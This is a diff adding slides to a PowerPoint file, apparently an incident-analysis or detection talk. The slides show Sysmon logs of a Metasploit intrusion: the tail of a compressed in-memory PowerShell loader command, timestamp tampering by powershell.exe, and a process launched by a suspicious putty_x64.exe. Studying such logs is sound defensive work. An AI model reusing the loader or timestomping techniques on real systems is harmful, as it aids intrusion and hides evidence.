+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.Compression.CompressionMode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]::Decompress))).</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ReadToEnd</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>()))";"1";"5";;"4";"1";"0";"-9223372036854775808";"589779";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:44";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ProcessCreate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="142301"/>
+            <a:ext cx="12192000" cy="585926"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>POWERSHELL PROCESS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704521522"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Obdélník 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1498473" y="1736229"/>
+            <a:ext cx="10515600" cy="3385542"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>"File creation time changed:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>RuleName</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>UtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-03-26 21:14:43.489</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-9643-5C9A-0000-001029551801}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 5620</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
+              <a:t>powershell.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>TargetFilename</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
+              <a:t>GPTP47LXLWQ9XHJFBNUM.temp</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>CreationUtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-02-18 07:25:45.895</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>PreviousCreationUtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 2019-03-26 21:14:43.489";"2";"4";;"4";"2";"0";"-9223372036854775808";"589777";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:43";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"File creation time changed (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>FileCreateTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="64008" y="201169"/>
+            <a:ext cx="12192000" cy="585926"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>METASPLOIT PROCESS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3419150997"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Obdélník 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1516761" y="1834651"/>
+            <a:ext cx="10515600" cy="3600986"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>CurrentDirectory</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\WINDOWS\system32\</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>User: PC2\user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>LogonGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>LogonId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 0x33832</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>TerminalSessionId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>IntegrityLevel</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: High</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentProcessGuid</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentProcessId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: 7660</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentImage</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: C:\Users\user\Desktop\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0"/>
+              <a:t>putty_x64.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ParentCommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>Sysmon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>ProcessCreate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.String</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]";"System.Collections.Generic.List`1[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
+              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0"/>
+              <a:t>]"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Nadpis 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="210313"/>
+            <a:ext cx="12192000" cy="585926"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="5400" dirty="0"/>
+              <a:t>METASPLOIT PROCESS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741484754"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Obrázek 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70F9D99-4B42-41B6-AC0E-3C7DE3699F2D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2650632" y="0"/>
+            <a:ext cx="6890735" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2657531265"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="1026" name="Picture 2" descr="https://4.bp.blogspot.com/-yoe0lGHrHLk/Wc1Jx2Q6ooI/AAAAAAAABA8/-e75oChj3zYPj9v_hf_Gaa0j5lM1XoBkwCLcBGAs/s1600/Win%2B10%2Bfixed.png">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6059BDFC-DCC0-4C24-AB1C-F0626C63F035}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="1684020" y="969408"/>
+            <a:ext cx="8374380" cy="4623356"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:extLst>
+            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a14:hiddenFill>
+            </a:ext>
+          </a:extLst>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906597098"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -10043,6 +11188,42 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="37" name="Obrázek 36">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2251208B-707C-41AE-96CA-61A3FFCB62E5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6247323" y="4664927"/>
+            <a:ext cx="5617589" cy="1989665"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
